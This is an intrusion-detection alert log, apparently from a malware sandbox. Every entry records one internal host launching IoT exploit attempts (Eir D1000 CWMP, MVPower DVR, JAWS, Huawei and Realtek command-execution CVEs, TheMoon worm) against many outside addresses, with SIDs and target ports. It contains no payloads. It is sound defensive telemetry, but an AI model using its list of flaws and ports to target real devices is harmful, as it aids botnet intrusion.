Timestamp:	03/18/24-09:59:49.190261
SID:	2023548
Source Port:	47804
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 67.211.69.254

Timestamp:	03/18/24-09:59:54.311935
SID:	2025883
Source Port:	60532
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 142.197.229.125

Timestamp:	03/18/24-09:56:59.920067
SID:	2025883
Source Port:	52370
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 67.231.250.92

Timestamp:	03/18/24-09:58:41.158159
SID:	2030092
Source Port:	47806
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.243.200.180

Timestamp:	03/18/24-09:57:04.039741
SID:	2023548
Source Port:	58342
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.187.168.226

Timestamp:	03/18/24-09:58:36.327491
SID:	2023548
Source Port:	36626
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 38.57.128.187

Timestamp:	03/18/24-09:57:06.219519
SID:	2025883
Source Port:	43714
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 45.33.38.47

Timestamp:	03/18/24-09:59:43.939815
SID:	2025883
Source Port:	35792
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 105.98.181.140

Timestamp:	03/18/24-09:58:13.296326
SID:	2023548
Source Port:	44186
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.76.109.138

Timestamp:	03/18/24-09:58:51.537631
SID:	2030092
Source Port:	56932
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.46.45.13

Timestamp:	03/18/24-09:59:26.025707
SID:	2030092
Source Port:	44814
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 47.90.56.66

Timestamp:	03/18/24-09:58:52.013648
SID:	2025883
Source Port:	48362
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 98.11.96.145

Timestamp:	03/18/24-09:58:35.057181
SID:	2023548
Source Port:	33260
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.84.21.38

Timestamp:	03/18/24-10:00:05.945839
SID:	2023548
Source Port:	33654
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.18.110.7

Timestamp:	03/18/24-09:58:36.278538
SID:	2025576
Source Port:	51694
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.43.199.212

Timestamp:	03/18/24-10:00:22.756651
SID:	2023548
Source Port:	36424
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.92.53.216

Timestamp:	03/18/24-09:59:56.842101
SID:	2023548
Source Port:	55630
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.219.239

Timestamp:	03/18/24-09:58:54.796545
SID:	2018132
Source Port:	35438
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.7.225.239

Timestamp:	03/18/24-09:59:33.242996
SID:	2023548
Source Port:	33606
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 163.18.18.192

Timestamp:	03/18/24-09:59:56.657972
SID:	2023548
Source Port:	60690
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.157.222

Timestamp:	03/18/24-09:59:56.818390
SID:	2018132
Source Port:	40164
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.19.169.26

Timestamp:	03/18/24-09:58:51.796237
SID:	2030092
Source Port:	37562
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 114.96.87.18

Timestamp:	03/18/24-09:59:17.980376
SID:	2030092
Source Port:	47576
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 18.214.118.245

Timestamp:	03/18/24-09:59:01.268389
SID:	2025883
Source Port:	56650
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 37.130.81.195

Timestamp:	03/18/24-09:58:15.919301
SID:	2025576
Source Port:	44230
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.64.202.226

Timestamp:	03/18/24-09:58:41.716309
SID:	2030092
Source Port:	39072
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 74.48.182.67

Timestamp:	03/18/24-09:59:49.053414
SID:	2030092
Source Port:	35338
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 39.111.17.106

Timestamp:	03/18/24-09:58:54.197940
SID:	2023548
Source Port:	42142
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 192.161.162.136

Timestamp:	03/18/24-09:59:54.431994
SID:	2030092
Source Port:	53814
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.120.136.94

Timestamp:	03/18/24-10:00:16.482958
SID:	2023548
Source Port:	45836
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 78.166.28.66

Timestamp:	03/18/24-09:57:01.072645
SID:	2023548
Source Port:	33510
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.38.25.68

Timestamp:	03/18/24-09:59:12.610070
SID:	2025576
Source Port:	39282
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.247.31.44

Timestamp:	03/18/24-09:59:09.614497
SID:	2835222
Source Port:	53746
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.5.196.147

Timestamp:	03/18/24-09:59:09.855159
SID:	2023548
Source Port:	40136
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.254.101.1

Timestamp:	03/18/24-09:58:53.955010
SID:	2835222
Source Port:	50546
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.3.76.41

Timestamp:	03/18/24-09:59:54.415356
SID:	2030092
Source Port:	55280
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 15.206.216.237

Timestamp:	03/18/24-09:59:48.523471
SID:	2025576
Source Port:	38610
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.104.163.91

Timestamp:	03/18/24-10:00:04.770225
SID:	2018132
Source Port:	46032
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 98.144.106.249

Timestamp:	03/18/24-09:58:17.936671
SID:	2023548
Source Port:	36552
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.73.18.248

Timestamp:	03/18/24-09:59:54.588404
SID:	2030092
Source Port:	40234
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 124.169.187.217

Timestamp:	03/18/24-10:00:06.617707
SID:	2023548
Source Port:	43976
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 210.1.22.12

Timestamp:	03/18/24-09:59:18.642310
SID:	2027339
Source Port:	48602
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.70.42.188

Timestamp:	03/18/24-10:00:10.894651
SID:	2025883
Source Port:	33374
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 197.255.152.175

Timestamp:	03/18/24-09:58:38.057042
SID:	2030092
Source Port:	55570
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.152.237.167

Timestamp:	03/18/24-09:58:16.186303
SID:	2023548
Source Port:	38134
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 107.178.183.125

Timestamp:	03/18/24-10:00:08.965496
SID:	2023548
Source Port:	59222
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 84.72.32.178

Timestamp:	03/18/24-09:58:26.859049
SID:	2023548
Source Port:	59228
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.56.242.49

Timestamp:	03/18/24-09:57:02.790699
SID:	2023548
Source Port:	53246
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.92.208.56

Timestamp:	03/18/24-10:00:05.946122
SID:	2023548
Source Port:	52140
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 206.238.94.194

Timestamp:	03/18/24-10:00:06.224791
SID:	2025576
Source Port:	47208
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.202.137.41

Timestamp:	03/18/24-10:00:20.779267
SID:	2018132
Source Port:	38468
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 4.225.160.97

Timestamp:	03/18/24-10:00:18.996358
SID:	2025883
Source Port:	45682
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 89.203.30.67

Timestamp:	03/18/24-09:58:57.685314
SID:	2025883
Source Port:	41590
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.176.217.112

Timestamp:	03/18/24-10:00:18.969836
SID:	2025883
Source Port:	55318
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.237.206.203

Timestamp:	03/18/24-09:58:23.941134
SID:	2023548
Source Port:	57082
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 67.175.7.145

Timestamp:	03/18/24-09:59:54.008512
SID:	2025883
Source Port:	36326
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 174.25.98.250

Timestamp:	03/18/24-09:58:34.246182
SID:	2023548
Source Port:	51796
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 189.69.252.115

Timestamp:	03/18/24-09:59:40.040483
SID:	2023548
Source Port:	33858
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.54.52.206

Timestamp:	03/18/24-10:00:21.439845
SID:	2023548
Source Port:	42768
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.33.235.147

Timestamp:	03/18/24-09:59:07.073368
SID:	2025576
Source Port:	48252
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.40.210.21

Timestamp:	03/18/24-09:58:19.974462
SID:	2030092
Source Port:	50216
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 195.245.82.70

Timestamp:	03/18/24-09:58:20.420942
SID:	2025883
Source Port:	54848
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 188.29.100.105

Timestamp:	03/18/24-09:59:02.150446
SID:	2023548
Source Port:	56654
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 193.201.190.239

Timestamp:	03/18/24-09:59:42.121599
SID:	2030092
Source Port:	52226
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 177.22.141.32

Timestamp:	03/18/24-09:58:48.118867
SID:	2030092
Source Port:	34870
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 88.87.69.76

Timestamp:	03/18/24-09:59:53.236211
SID:	2025576
Source Port:	38162
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 65.131.199.42

Timestamp:	03/18/24-09:58:22.431252
SID:	2023548
Source Port:	43148
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.225.62.214

Timestamp:	03/18/24-09:58:42.638914
SID:	2023548
Source Port:	52662
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 83.136.195.148

Timestamp:	03/18/24-09:58:27.594789
SID:	2025576
Source Port:	34506
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 82.9.9.253

Timestamp:	03/18/24-09:58:13.260563
SID:	2023548
Source Port:	36612
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 87.249.144.177

Timestamp:	03/18/24-09:59:41.116594
SID:	2025576
Source Port:	60836
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 74.71.54.66

Timestamp:	03/18/24-09:58:16.005463
SID:	2023548
Source Port:	53206
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 172.90.168.5

Timestamp:	03/18/24-09:57:00.704238
SID:	2023548
Source Port:	33704
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 121.183.246.210

Timestamp:	03/18/24-09:59:41.048434
SID:	2030092
Source Port:	48018
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 46.148.230.114

Timestamp:	03/18/24-09:57:04.031856
SID:	2025576
Source Port:	52262
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 154.203.12.240

Timestamp:	03/18/24-09:58:28.170647
SID:	2023548
Source Port:	49230
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 38.28.174.40

Timestamp:	03/18/24-09:56:57.279538
SID:	2030092
Source Port:	52090
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 58.214.18.227

Timestamp:	03/18/24-09:58:20.648338
SID:	2030092
Source Port:	40678
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.233.102.108

Timestamp:	03/18/24-10:00:09.491426
SID:	2023548
Source Port:	48918
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 84.35.121.8

Timestamp:	03/18/24-09:58:27.132401
SID:	2030092
Source Port:	35844
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 89.161.189.73

Timestamp:	03/18/24-09:58:21.168628
SID:	2025883
Source Port:	48826
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.226.106

Timestamp:	03/18/24-09:58:18.146492
SID:	2018132
Source Port:	35142
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.238.178.244

Timestamp:	03/18/24-09:56:59.615227
SID:	2023548
Source Port:	52138
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 18.225.57.211

Timestamp:	03/18/24-09:59:25.825371
SID:	2025883
Source Port:	60092
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 188.186.89.81

Timestamp:	03/18/24-09:59:26.199493
SID:	2023548
Source Port:	49308
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 38.28.174.40

Timestamp:	03/18/24-09:56:59.475469
SID:	2025883
Source Port:	52180
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 83.143.132.22

Timestamp:	03/18/24-09:57:00.375328
SID:	2025883
Source Port:	48016
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 192.143.12.15

Timestamp:	03/18/24-10:00:21.753716
SID:	2023548
Source Port:	53272
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 147.46.119.255

Timestamp:	03/18/24-09:58:42.057541
SID:	2023548
Source Port:	56370
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.254.70.15

Timestamp:	03/18/24-09:59:56.743429
SID:	2829579
Source Port:	58670
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 85.128.222.86

Timestamp:	03/18/24-09:59:00.019996
SID:	2025883
Source Port:	51844
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 64.227.145.234

Timestamp:	03/18/24-09:59:41.488425
SID:	2025576
Source Port:	58766
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.120.20.207

Timestamp:	03/18/24-09:58:17.791676
SID:	2023548
Source Port:	56454
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 107.178.243.68

Timestamp:	03/18/24-09:57:07.897632
SID:	2023548
Source Port:	60724
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 78.166.28.66

Timestamp:	03/18/24-09:57:01.306981
SID:	2023548
Source Port:	33522
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.132.199

Timestamp:	03/18/24-09:58:36.886025
SID:	2018132
Source Port:	40422
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 204.117.211.14

Timestamp:	03/18/24-10:00:10.987267
SID:	2025883
Source Port:	50500
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 116.75.228.172

Timestamp:	03/18/24-09:58:48.655828
SID:	2023548
Source Port:	58442
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 67.52.161.222

Timestamp:	03/18/24-09:59:51.991655
SID:	2030092
Source Port:	33448
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 201.211.196.255

Timestamp:	03/18/24-09:59:56.381179
SID:	2025576
Source Port:	60224
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 148.72.72.45

Timestamp:	03/18/24-09:57:05.760880
SID:	2030092
Source Port:	33696
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 152.67.216.214

Timestamp:	03/18/24-09:59:25.416092
SID:	2025576
Source Port:	46740
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.19.250.149

Timestamp:	03/18/24-09:58:16.671692
SID:	2030092
Source Port:	58466
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 193.33.133.175

Timestamp:	03/18/24-09:58:43.306627
SID:	2025883
Source Port:	53998
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 64.226.94.5

Timestamp:	03/18/24-09:59:42.121375
SID:	2030092
Source Port:	33704
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 191.61.110.88

Timestamp:	03/18/24-09:59:45.303674
SID:	2027339
Source Port:	38216
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.98.16

Timestamp:	03/18/24-09:59:03.304506
SID:	2018132
Source Port:	38404
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 162.255.250.182

Timestamp:	03/18/24-09:59:05.965846
SID:	2030092
Source Port:	42616
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.35.141.21

Timestamp:	03/18/24-09:59:14.261780
SID:	2023548
Source Port:	46818
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.171.184.202

Timestamp:	03/18/24-09:59:47.366904
SID:	2023548
Source Port:	45392
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 90.84.187.21

Timestamp:	03/18/24-10:00:14.782799
SID:	2030092
Source Port:	36726
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.35.141.21

